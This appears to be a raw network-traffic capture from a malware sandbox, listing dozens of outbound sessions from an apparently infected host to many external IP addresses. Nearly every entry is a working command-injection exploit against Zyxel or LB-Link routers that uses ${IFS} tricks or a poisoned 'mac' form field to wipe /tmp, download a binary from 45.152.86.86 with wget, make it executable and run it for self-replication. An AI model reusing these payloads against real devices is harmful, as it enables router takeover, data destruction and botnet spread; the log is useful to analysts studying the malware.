                              Mar 31, 2024 08:41:29.896591902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5092192.168.2.134662697.235.2.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896640062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5093192.168.2.1355988150.142.230.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896672964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5094192.168.2.1352848107.178.151.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896733046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5095192.168.2.1358832212.227.57.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896761894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5096192.168.2.133681434.45.116.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896787882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5097192.168.2.134467281.71.97.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896823883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5098192.168.2.135950836.110.217.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900455952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5099192.168.2.133397831.174.76.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900465965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5100192.168.2.134365868.195.252.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900468111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5101192.168.2.1338944141.213.37.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900490999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5102192.168.2.1359588160.11.146.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900544882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5103192.168.2.1352710170.185.76.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900592089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5104192.168.2.1352414210.125.113.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900620937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5105192.168.2.1349680112.215.168.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900665998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5106192.168.2.133367849.213.61.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900702953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5107192.168.2.135147045.65.140.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900805950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5108192.168.2.133438678.137.21.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900801897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5109192.168.2.135315832.154.240.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900832891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5110192.168.2.1335004207.38.185.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900835991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5111192.168.2.1341848206.227.157.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900854111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5112192.168.2.134225284.199.33.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900933027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5113192.168.2.133525887.248.46.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.900964975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5114192.168.2.135685834.12.62.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901061058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5115192.168.2.1333356222.94.54.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901067019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5116192.168.2.135440414.181.177.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901098013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5117192.168.2.135411253.248.30.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901174068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5118192.168.2.134033089.170.229.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901201010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5119192.168.2.13489082.73.43.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901246071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5120192.168.2.1352392139.46.85.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901289940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5121192.168.2.1344920217.137.51.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.901364088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5122192.168.2.1334402104.25.113.2258080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.805593014 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:30.900182962 CEST328INHTTP/1.1 400 Bad Request
                              Server: cloudflare
                              Date: Sun, 31 Mar 2024 06:41:30 GMT
                              Content-Type: text/html
                              Content-Length: 155
                              Connection: close
                              CF-RAY: -
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              5123192.168.2.1360422184.83.5.368080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.852569103 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:31.000612020 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:31.992096901 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:33.990403891 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:37.990540981 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:45.990668058 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              5124192.168.2.1347128186.128.213.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.911863089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5125192.168.2.1339216141.59.130.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.911912918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5126192.168.2.135766051.106.185.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912111998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5127192.168.2.136084071.96.16.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912163019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5128192.168.2.133676036.114.101.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912235022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5129192.168.2.134558475.216.231.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912317991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5130192.168.2.1348632208.99.175.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912368059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5131192.168.2.1353406105.80.208.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912432909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5132192.168.2.13598648.13.205.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912506104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5133192.168.2.134459018.199.137.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912558079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5134192.168.2.134154048.183.241.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912620068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5135192.168.2.1353836188.80.40.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912693024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5136192.168.2.1337590182.101.144.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912759066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5137192.168.2.1345350181.81.24.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912837029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5138192.168.2.134480047.187.32.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912895918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5139192.168.2.1341276178.130.34.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.912946939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5140192.168.2.1354228216.142.128.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913018942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5141192.168.2.1357494169.132.173.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913095951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5142192.168.2.1346072159.93.177.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913142920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5143192.168.2.1338788104.163.0.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913208008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5144192.168.2.134977062.152.122.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913283110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5145192.168.2.1353966149.221.69.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913347006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5146192.168.2.1347474184.157.42.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913424015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5147192.168.2.1337578212.186.222.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913486004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5148192.168.2.134630688.24.173.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913558006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5149192.168.2.1338240112.120.64.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913624048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5150192.168.2.135611086.223.227.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913691044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5151192.168.2.1333430185.214.3.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913764000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5152192.168.2.1336576104.193.228.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913815022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5153192.168.2.135744875.118.41.214443
                              TimestampBytes transferredDirectionData
